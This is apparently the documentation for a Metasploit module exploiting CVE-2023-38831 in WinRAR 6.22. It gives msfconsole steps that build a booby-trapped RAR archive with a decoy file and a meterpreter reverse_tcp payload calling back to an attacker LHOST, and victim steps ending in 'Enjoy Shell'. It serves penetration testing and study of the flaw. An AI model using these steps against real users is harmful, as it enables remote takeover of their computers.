## Vulnerable Application
This module exploits a vulnerability in WinRAR 6.22 (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/windows/fileformat/winrar_cve_2023_38831`
1. Do: `set INPUT_FILE /path/to/decoy/file`
1. Do: `set OUTPUT_FILE /path/to/output/file`
1. Do: `set PAYLOAD windows/meterpreter/reverse_tcp`
1. Do: `set LHOST <local IP>`
1. Do: `set LPORT <local port>`
1. Do: `exploit`

Target

1. Install WinRAR 6.22
1. Open OUTPUT_FILE
1. Click on INPUT_FILE withinin archive
1. Enjoy Shell

## Scenarios

### Windows
The exploit creates a RAR file that contains a decoy document and a CMD script. The CMD script is executed when the decoy document is opened, leading to code execution on the target system.

## Options

### INPUT_FILE
Path to the decoy file (PDF, JPG, PNG, etc.) that will be embedded in the crafted RAR file.

### OUTPUT_FILE
The filename for the crafted RAR file that will be generated.

## References 

[CVE-2023-38831](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-38831)
[Group-IB Research](https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/)
[Analysis](https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/)